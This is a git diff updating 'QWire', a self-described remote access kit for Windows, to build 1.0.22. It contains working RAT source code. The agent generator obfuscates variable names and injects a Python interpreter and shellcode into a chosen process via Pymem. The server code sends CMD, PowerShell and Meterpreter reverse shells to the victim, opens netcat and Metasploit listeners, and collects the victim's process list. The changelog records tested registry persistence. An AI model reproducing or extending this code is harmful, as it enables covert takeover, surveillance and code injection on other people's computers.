IconObj diff --git a/core/Qt5/misc_gui/update_log_window.py b/core/Qt5/misc_gui/update_log_window.py index 438c362..0368300 100644 --- a/core/Qt5/misc_gui/update_log_window.py +++ b/core/Qt5/misc_gui/update_log_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtCore, QtWidgets from core.Qt5.icons import IconObj @@ -46,7 +46,7 @@ BUILD_1021 = ['Build 1.0.21', 'April 23rd 2022', 're-organized code for GUI\'s', - 'Re-structured some of the file hierarchy around the builder and the GUI\'s' + 'Re-structured some of the file hierarchy around the builder and the GUI\'s', 'Added webcam snapshot feature to surveillance', 'Re - Structured Surveillance menu', ' Surveillance > Desktop > Screenshot', @@ -55,10 +55,20 @@ 'Fixed issue with agent disconnecting when server shuts down during initial handshake' ] +BUILD_1022 = ['Build 1.0.22', + 'TBD', + 'Tested agent on Windows 7 Ultimate SP1', + 'Re-coded task manager on client and server', + 'Optimized context menu code. Menu now loads instantly', + 'Test powershell reg key peristence on Windows 7. Working.', + 'Added python injector to Task Manager', + 'Added CMD, PS and Meterpreter shells to python injector'] + MASTER_ARRAY = [BUILD_100, BUILD_101, BUILD_102, - BUILD_1021,] + BUILD_1021, + BUILD_1022] class Ui_update_log_window(object): diff --git a/core/Qt5/settings_gui/domains_window.py b/core/Qt5/settings_gui/domains_window.py index a6bab25..64b0a06 100644 --- a/core/Qt5/settings_gui/domains_window.py +++ b/core/Qt5/settings_gui/domains_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtCore, QtWidgets from core.Qt5.icons import IconObj diff --git a/core/Qt5/settings_gui/duck_dns_token_window.py b/core/Qt5/settings_gui/duck_dns_token_window.py index 4496a4e..44d3c40 100644 --- a/core/Qt5/settings_gui/duck_dns_token_window.py +++ b/core/Qt5/settings_gui/duck_dns_token_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtCore, QtWidgets from core.logging.logging import DNSconfigs diff --git a/core/Qt5/settings_gui/settings_window.py b/core/Qt5/settings_gui/settings_window.py index dceb0e9..7f2d096 100644 --- a/core/Qt5/settings_gui/settings_window.py +++ b/core/Qt5/settings_gui/settings_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtCore, QtGui, QtWidgets from core.logging.logging import ConsoleWindow,LoggingUtilitys diff --git a/core/Qt5/settings_gui/webhook_window.py b/core/Qt5/settings_gui/webhook_window.py index 4371832..7d4acb7 100644 --- a/core/Qt5/settings_gui/webhook_window.py +++ b/core/Qt5/settings_gui/webhook_window.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtCore, QtWidgets from core.Qt5.icons import IconObj diff --git a/core/builder/utils/encryption.py b/core/builder/utils/encryption.py index 3e58218..8fd94a4 100644 --- a/core/builder/utils/encryption.py +++ b/core/builder/utils/encryption.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import string import random diff --git a/core/builder/windows10/agent_builder.py b/core/builder/windows10/agent_builder.py index 6b220ae..a933d0a 100644 --- a/core/builder/windows10/agent_builder.py +++ b/core/builder/windows10/agent_builder.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from ..windows10.stub import QWireAgent from ..utils.encryption import Scrambler,Crypter diff --git a/core/builder/windows10/stub.py b/core/builder/windows10/stub.py index 4dd723c..e2c8cff 100644 --- a/core/builder/windows10/stub.py +++ b/core/builder/windows10/stub.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from ..utils.encryption import Scrambler from core.logging.logging import LoggingUtilitys @@ -138,10 +138,7 @@ def generate_agent_code(self, server_port, stream_port, exfil_port, domain_name, code = Persistance().registry_start_up( function_name,CURRENT_DIR,persistence_option ) - get_running_process = Scrambler().scrambleVar(self.variable_length) - com_output = Scrambler().scrambleVar(self.variable_length) extract_process_list = Scrambler().scrambleVar(self.variable_length) - process_list = Scrambler().scrambleVar(self.variable_length) output = Scrambler().scrambleVar(self.variable_length) pid = Scrambler().scrambleVar(self.variable_length) kill_task = Scrambler().scrambleVar(self.variable_length) @@ -158,6 +155,13 @@ def generate_agent_code(self, server_port, stream_port, exfil_port, domain_name, web_cam = Scrambler().scrambleVar(self.variable_length) stream_sock = Scrambler().scrambleVar(self.variable_length) img = Scrambler().scrambleVar(self.variable_length) + process_string = Scrambler().scrambleVar(self.variable_length) + process_name =Scrambler().scrambleVar(self.variable_length) + string = Scrambler().scrambleVar(self.variable_length) + username = Scrambler().scrambleVar(self.variable_length) + inject_python = Scrambler().scrambleVar(self.variable_length) + process = Scrambler().scrambleVar(self.variable_length) + inject_and_exec = Scrambler().scrambleVar(self.variable_length) agent_source = f""" import socket as socket import base64 as base64 @@ -168,9 +172,11 @@ def generate_agent_code(self, server_port, stream_port, exfil_port, domain_name, import threading as threading import struct as struct import cv2 +import psutil from PIL import ImageGrab as ImageGrab from time import sleep as sleep from cryptography.fernet import Fernet +from pymem import Pymem {SEP} = '' {BUFFER} = 4096 {SERV_PORT} = {server_port} @@ -192,11 +198,7 @@ def {get_windows_version}(self): {command} = subprocess.Popen(['powershell', '(Get-WmiObject -class Win32_OperatingSystem).Version'],stdout=subprocess.PIPE) {version_output} = {command}.stdout.read().decode() {version_output} = {version_output}.replace('\\n','') - return {version_output}.strip('\\r') - def {get_running_process}(self): - {command} = subprocess.Popen(['powershell', 'get-process'],stdout=subprocess.PIPE,shell=True) - {com_output} = {command}.stdout.read().decode() - return {com_output} + return {version_output}.strip('\\r') def {get_local_ip}(self): {local_ip} = socket.gethostbyname(socket.gethostname()) return {local_ip} @@ -233,8 +235,17 @@ def {restart_computer}(self): def {shutdown_computer}(self): subprocess.run('shutdown /p') def {extract_process_list}(self): - {process_list} = {Utilitys}().{get_running_process}() - {ExfilSocket}().{exfil_socket_send}({process_list}) + {process_string} = '' + for {process} in psutil.process_iter(): + {process_name} = {process}.name() + {pid} = {process}.pid + try: + {username} = {process}.username() + except psutil.AccessDenied: + {username} = 'NT AUTHORITY\SYSTEM' + {string} = f'{{{process_name}}}{{{SEP}}}{{str({pid})}}{{{SEP}}}{{{username}}}{{{SEP}}}\\n' + {process_string} += {string} + {ExfilSocket}().{exfil_socket_send}({process_string}) def {kill_task}(self,{pid}): {command} = subprocess.Popen(['taskkill','/pid',str({pid}),'/f'],stdout=subprocess.PIPE,shell=True) {output} = {command}.stdout.read().decode() @@ -269,6 +280,7 @@ def __init__(self): self.{process_manager} = 'proc_list' self.{term_process} = 'terminate' self.{snapshot} = 'snap_shot' + self.{inject_python} = 'inject_pie' def {connect_to_server}(self): {domain} = socket.gethostbyname(self.{dns_address}) self.{client_socket} = socket.socket(socket.AF_INET,socket.SOCK_STREAM) @@ -344,7 +356,9 @@ def {main}(self): if {action_flag} == self.{term_process}: {SystemManager}().{kill_task}({server_command}[1]) if {action_flag} == self.{snapshot}: - {StreamSocket}().{webcam_snapshot}() + {StreamSocket}().{webcam_snapshot}() + if {action_flag} == self.{inject_python}: + {CodeExecution}().{inject_and_exec}({server_command}[1],{server_command}[2]) def {recv_all_data}(self): try: {bytes_data} = b'' @@ -436,6 +450,10 @@ def {exec_}({system_command}): except Exception as {error}: pass {MultiProcessor}().{start_child_thread_arg}({exec_},{system_command}) + def {inject_and_exec}(self,{process_name},{python_code}): + {process} = Pymem({process_name}) + {process}.inject_python_interpreter() + {process}.inject_python_shellcode({python_code}) {ClientSocket}().{connect_to_server}() """ return agent_source \ No newline at end of file diff --git a/core/client_handling/enumeration.py b/core/client_handling/enumeration.py index 6d25d92..a6d657d 100644 --- a/core/client_handling/enumeration.py +++ b/core/client_handling/enumeration.py @@ -10,23 +10,23 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from core.networking.sockets.server_socket import ServerSocket from core.networking.sockets.receiver_socket import ReceiverSocket from core.threading.threads import MultiThreading from core.client_handling.flags import ClientActionFlags - +from core.utils.file_paths import DSFilePath class SystemCommands: #Function will create receiver socket and tell agent to send output of systeminfo and ipconfig /all commands def exfil_sys_and_ip_info(self,encryption_key,client): - MultiThreading().create_background_thread_arg(ReceiverSocket().recv_sys_ip_info,encryption_key) #Create thread to catch data from agent + MultiThreading().create_background_thread_arg_arg(ReceiverSocket().recv_and_log_data,DSFilePath().sys_info_file ,encryption_key) #Create thread to catch data from agent flag = f'{ClientActionFlags().extract_sys_ip_info}{ClientActionFlags().seperator} ' #Action flag ServerSocket().send_data_to_client(client,encryption_key,flag) #Tell client to run commands #Function will create receiver socket and instruct agent to send list of running process's on machine def extract_running_process(self,encryption_key,client): - MultiThreading().create_background_thread_arg(ReceiverSocket().recv_running_process,encryption_key) #Create background thread + MultiThreading().create_background_thread_arg_arg(ReceiverSocket().recv_and_log_data,DSFilePath().task_manager_file,encryption_key) #Create background thread flag = f'{ClientActionFlags().task_manager}{ClientActionFlags().seperator} ' #Generate flag string ServerSocket().send_data_to_client(client,encryption_key,flag) #Send data to client \ No newline at end of file diff --git a/core/client_handling/flags.py b/core/client_handling/flags.py index 2732676..1c08332 100644 --- a/core/client_handling/flags.py +++ b/core/client_handling/flags.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- #Class is for storing flag strings to make the client do different actions class ClientActionFlags: @@ -29,4 +29,5 @@ def __init__(self): self.disconnect = 'disconnect' self.task_manager = 'proc_list' self.kill_process = 'terminate' - self.snapshot = 'snap_shot' \ No newline at end of file + self.snapshot = 'snap_shot' + self.inject_python = 'inject_pie' \ No newline at end of file diff --git a/core/client_handling/meterpreter_payloads.py b/core/client_handling/meterpreter_payloads.py index 0cfceca..bf8a16f 100644 --- a/core/client_handling/meterpreter_payloads.py +++ b/core/client_handling/meterpreter_payloads.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- """ Define meterpreter payload strings diff --git a/core/client_handling/networking.py b/core/client_handling/networking.py index e814252..a41bd11 100644 --- a/core/client_handling/networking.py +++ b/core/client_handling/networking.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from core.networking.sockets.server_socket import ServerSocket from core.networking.sockets.receiver_socket import ReceiverSocket @@ -20,7 +20,7 @@ class NetHandle: #Function will ping the client def ping_client(self,encryption_key,client): - MultiThreading().create_background_thread_arg(ReceiverSocket().recv_ping_reply,encryption_key) #Create socket to catch response in new thread + MultiThreading().create_background_thread_arg(ReceiverSocket().recv_to_console, encryption_key) #Create socket to catch response in new thread ServerSocket().send_data_to_client(client,encryption_key,f'{ClientActionFlags().ping_client}{ClientActionFlags().seperator} ') #Ping the client #Function will tell client to reconnect diff --git a/core/client_handling/payload_code.py b/core/client_handling/payload_code.py index 743280e..a4f69b8 100644 --- a/core/client_handling/payload_code.py +++ b/core/client_handling/payload_code.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- """ Define a class to store payload strings. @@ -67,6 +67,7 @@ def msf_shellcode_injector(self,shellcode,process_id): """ return code + #Function will return the code for a command shell def command_shell(self,host,port): code = f"""import socket as s import subprocess as r diff --git a/core/client_handling/shell.py b/core/client_handling/shell.py index 19df00f..9f8379e 100644 --- a/core/client_handling/shell.py +++ b/core/client_handling/shell.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import os @@ -52,13 +52,20 @@ def open_meterpreter_listener(self,payload,lport): """ class Meterpreter(): + #Function will instruct agent to inject a python meterpreter shell + def inject_exec_py_meter(self,client,encryption_key,process_name): + shell_code = PayloadCode().staged_python_meterpreter(SystemShell().listening_host,SystemShell().listening_port) #Prepare shell code + ListenerHandler().open_meterpreter_listener(MSFPayload().staged_python_meterpreter,SystemShell().listening_port) #Open listener + data = f'{ClientActionFlags().inject_python}{ClientActionFlags().seperator}{process_name}{ClientActionFlags().seperator}{shell_code}' + ServerSocket().send_data_to_client(client,encryption_key,data) #Send data to client + #Function will send python meterpreter shellcode to client and open listener to catch connection def exec_python_meterpreter_shell(self,lport,encryption_key,client): domain = DNSconfigs().retrieve_domain_for_shell() #Retrieve the domain chosen for shells shell_code = PayloadCode().staged_python_meterpreter(domain,lport) #Construct shellcode ListenerHandler().open_meterpreter_listener(MSFPayload().staged_python_meterpreter,lport) #Open the listener data = str(f'{ClientActionFlags().exec_python_code}{ClientActionFlags().seperator}{shell_code}')#Prepare the data with the shell code - ServerSocket().send_data_to_client(client,encryption_key,data) #Send the data to the client for execution + ServerSocket().send_data_to_client(client,encryption_key,data) #Send the data to the client for execution #Function will create msf shellcode and injection stub with PID as param then send it to the agent for execution def inject_msf_payload(self,payload,process_id,encryption_key,client): @@ -79,20 +86,39 @@ def inject_msf_payload(self,payload,process_id,encryption_key,client): Define a class to prepare send and catch powershell shells """ class SystemShell: + def __init__(self): + self.listening_host = DNSconfigs().retrieve_domain_for_shell() + self.listening_port = NetworkingConfigs().retrieve_shell_lport() #Function will execute a reverse shell using powershell - def exec_reverse_shell(self,lport,encryption_key,client): - lhost = DNSconfigs().retrieve_domain_for_shell() #Get the lhost from the config file - shell_code = PayloadCode().reverse_powershell(lhost, lport) #Prepare the shellcode - ListenerHandler().open_netcat_listener(lport) #Open listener + def exec_reverse_shell(self,encryption_key,client): + shell_code = PayloadCode().reverse_powershell(self.listening_host, self.listening_port) #Prepare the shellcode + ListenerHandler().open_netcat_listener(self.listening_port) #Open listener data = str(f'{ClientActionFlags().system_command}{ClientActionFlags().seperator}{shell_code}') #Prepare the data ServerSocket().send_data_to_client(client,encryption_key,data) #Send the data to the client for execution #Function will execute a cmd prompt type reverse shell def exec_cmd_shell(self,client,encryption_key): - lhost = DNSconfigs().retrieve_domain_for_shell() #Get the lhost string - lport = NetworkingConfigs().retrieve_shell_lport() #Get the lport string - shellcode = PayloadCode().command_shell(lhost,lport) #Create the code for the payload w/ the connection info - ListenerHandler().open_netcat_listener(lport) #Open a listener handler on the lport + shellcode = PayloadCode().command_shell(self.listening_host,self.listening_port) #Create the code for the payload w/ the connection info + ListenerHandler().open_netcat_listener(self.listening_port) #Open a listener handler on the lport data = str(f'{ClientActionFlags().exec_python_code}{ClientActionFlags().seperator}{shellcode}') #Create the data flag for the client - ServerSocket().send_data_to_client(client,encryption_key,data) #Send the flag to the client for processing \ No newline at end of file + ServerSocket().send_data_to_client(client,encryption_key,data) #Send the flag to the client for processing + + #Function will instruct agent to inject a python interpreter + #Into a process and then execute python code from that process + #That will give us a command shell + def inject_exec_CMD(self,client,encryption_key,process_name): + shell_code = PayloadCode().command_shell(self.listening_host,self.listening_port) #Generate shell code string + ListenerHandler().open_netcat_listener(self.listening_port) #Open listener + data = str(f'{ClientActionFlags().inject_python}{ClientActionFlags().seperator}{process_name}{ClientActionFlags().seperator}{shell_code}') + ServerSocket().send_data_to_client(client,encryption_key,data) #Send data to agent + + # Function will instruct agent to inject a python interpreter + # Into a process and then execute python code from that process + # That will give us a powershell shell + def inject_exec_PS(self, client, encryption_key, process_name): + code = str(PayloadCode().reverse_powershell(self.listening_host, self.listening_port)).replace("'","\\'") #Make minor adjustments to payload code + shell_code = f'import subprocess;subprocess.run(\'{code}\',shell=True)' #Prepare shellcode + ListenerHandler().open_netcat_listener(self.listening_port) #Open listener + data = str(f'{ClientActionFlags().inject_python}{ClientActionFlags().seperator}{process_name}{ClientActionFlags().seperator}{shell_code}') + ServerSocket().send_data_to_client(client, encryption_key, data) #Send data to the client \ No newline at end of file diff --git a/core/client_handling/surveillance.py b/core/client_handling/surveillance.py index b49b25e..779a53e 100644 --- a/core/client_handling/surveillance.py +++ b/core/client_handling/surveillance.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from core.networking.sockets.server_socket import ServerSocket from core.networking.sockets.stream_socket import StreamingSocket diff --git a/core/client_handling/system.py b/core/client_handling/system.py index 481d352..3a21161 100644 --- a/core/client_handling/system.py +++ b/core/client_handling/system.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from core.networking.sockets.server_socket import ServerSocket from core.client_handling.flags import ClientActionFlags diff --git a/core/encryption/aes128.py b/core/encryption/aes128.py index aacd222..33115d2 100644 --- a/core/encryption/aes128.py +++ b/core/encryption/aes128.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from cryptography.fernet import Fernet from core.logging.logging import NetworkingConfigs diff --git a/core/logging/logging.py b/core/logging/logging.py index 98c4905..a49e1a6 100644 --- a/core/logging/logging.py +++ b/core/logging/logging.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import os from ..utils.utils import ErrorHandling,Notifications diff --git a/core/networking/sockets/receiver_socket.py b/core/networking/sockets/receiver_socket.py index 1a921d2..edec20b 100644 --- a/core/networking/sockets/receiver_socket.py +++ b/core/networking/sockets/receiver_socket.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import socket @@ -70,41 +70,17 @@ def recv_string(self,encryption_key): string = self.get_data_from_client(encryption_key) #Get string return string #Return it - #Function will receive ping reply and log it to the gui console - def recv_ping_reply(self,encryption_key): + #Function will receive data from the client and write it to console + def recv_to_console(self, encryption_key): self.create_receiver_socket() #Create socket & listen for connection ping_reply = self.get_data_from_client(encryption_key) #Accept the connection, process reply, close connection ConsoleWindow().log_to_console(ping_reply) #Log the reply to the console window - #Function will receive sys/ip command out put from client and write to a file - def recv_sys_ip_info(self,encryption_key): + #Function will receive and log the data to a file + def recv_and_log_data(self, file_path,encryption_key): self.create_receiver_socket() #Create receiver socket info_exfil = self.get_data_from_client(encryption_key) #Get the data from the client and decrypt it - LoggingUtilitys().write_data_to_file(DSFilePath().sys_info_file,info_exfil) #Write the data to the data storage file - - #Function will receive the list of running process's from the client, format and log it to the data storage directory - def recv_running_process(self,encryption_key): - self.create_receiver_socket() #Create receiver socket - process_list = self.get_data_from_client(encryption_key) #Get process list from client - data_line_array = process_list.splitlines() #Split the lines of the process list - with open(DSFilePath().task_manager_file,'w') as task_file: #Open Data storage file - master_array = [] #Create master array - for line in data_line_array: #For each line in the array - if line != '': #If the line is not an empty string - array = [] #Create array local to loop iteration - for data in line.split(' '): #For each piece of data split, to remove whitespace - if data != '': #If the data is not an empty string, remove more invalid data - array.append(data) #Append the data to the local array - try: - master_array.append(array[7]) #Append the process name - master_array.append(array[5]) #Append the PID - master_array.append(array[4]) #Append the CPU Usage - except IndexError: #If there is a missing item from original command output on client, dial back the index by one. This is for proc's that don't have CPU output - master_array.append(array[6]) - master_array.append(array[4]) - master_array.append(array[3]) - task_file.write(str(master_array[6:]).strip('[').strip(']')+'\n') #When done with processing, write the data to the data storage file - task_file.close() + LoggingUtilitys().write_data_to_file(file_path,info_exfil) #Write the data to the data storage file #Function will receive the output from the taskkill command def recv_taskkill_output(self,encryption_key): diff --git a/core/networking/sockets/server_socket.py b/core/networking/sockets/server_socket.py index 446c8a1..1a7370b 100644 --- a/core/networking/sockets/server_socket.py +++ b/core/networking/sockets/server_socket.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import socket import base64 diff --git a/core/networking/sockets/stream_socket.py b/core/networking/sockets/stream_socket.py index f7a9558..a06b2fe 100644 --- a/core/networking/sockets/stream_socket.py +++ b/core/networking/sockets/stream_socket.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import socket import struct diff --git a/core/networking/utils/IP_Handler.py b/core/networking/utils/IP_Handler.py index 5c0282b..82b2856 100644 --- a/core/networking/utils/IP_Handler.py +++ b/core/networking/utils/IP_Handler.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import netifaces import requests diff --git a/core/networking/utils/dns_handler.py b/core/networking/utils/dns_handler.py index 9f227d1..8b3b103 100644 --- a/core/networking/utils/dns_handler.py +++ b/core/networking/utils/dns_handler.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import requests from core.networking.utils.IP_Handler import IPAddress diff --git a/core/threading/threads.py b/core/threading/threads.py index cd7de3e..f3009e9 100644 --- a/core/threading/threads.py +++ b/core/threading/threads.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import threading from PyQt5 import QtCore diff --git a/core/utils/file_paths.py b/core/utils/file_paths.py index 2eaf384..44b9460 100644 --- a/core/utils/file_paths.py +++ b/core/utils/file_paths.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- import os @@ -34,15 +34,14 @@ def retrieve_file_data(self,file_path): #Data storage file paths class DSFilePath: def __init__(self): - self.sys_info_file = LoggingUtilitys().get_misc_file_path_str('data_storage/sysinfo_window/sysinfo.txt') + self.sys_info_file = LoggingUtilitys().get_misc_file_path_str('data_storage/sysinfo.txt') self.streaming_frame = LoggingUtilitys().get_misc_file_path_str('data_storage/frame.jpg') self.console_output_file = LoggingUtilitys().get_misc_file_path_str('data_storage/console_window/console_output.txt') self.active_connections_file = LoggingUtilitys().get_misc_file_path_str('data_storage/console_window/active_connections.txt') self.bits_file = LoggingUtilitys().get_misc_file_path_str('data_storage/console_window/bits.txt') self.listening_sockets_file = LoggingUtilitys().get_misc_file_path_str('data_storage/console_window/listening.txt') - self.task_manager_file = LoggingUtilitys().get_misc_file_path_str('data_storage/sysinfo_window/task_list.txt') - self.task_manager_csv = LoggingUtilitys().get_misc_file_path_str('data_storage/sysinfo_window/task_list.csv') - self.job_file = LoggingUtilitys().get_misc_file_path_str('data_storage/sysinfo_window/job.txt') + self.task_manager_file = LoggingUtilitys().get_misc_file_path_str('data_storage/task_list.txt') + self.job_file = LoggingUtilitys().get_misc_file_path_str('data_storage/job.txt') self.msf_shellcode_file = LoggingUtilitys().get_misc_file_path_str('data_storage/shellcode.txt') #Config file paths diff --git a/core/utils/utils.py b/core/utils/utils.py index 3f81968..d631e3e 100644 --- a/core/utils/utils.py +++ b/core/utils/utils.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from PyQt5 import QtWidgets from PyQt5 import QtGui diff --git a/data_storage/sysinfo_window/.keep b/data_storage/sysinfo_window/.keep deleted file mode 100644 index e69de29..0000000 diff --git a/launch.py b/launch.py index 06dede6..b02ffe3 100755 --- a/launch.py +++ b/launch.py @@ -11,7 +11,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from core.Qt5.main_window.qwire_main_gui import Ui_main_window from core.utils.file_paths import DSFilePath diff --git a/setup.py b/setup.py index db688bc..efdff4c 100644 --- a/setup.py +++ b/setup.py @@ -10,7 +10,7 @@ # [A Remote Access Kit for Windows] # Author: SlizBinksman # Github: https://github.com/slizbinksman -# Build: 1.0.21 +# Build: 1.0.22 # ------------------------------------------------------------- from subprocess import run from core.utils.file_paths import CFGFilePath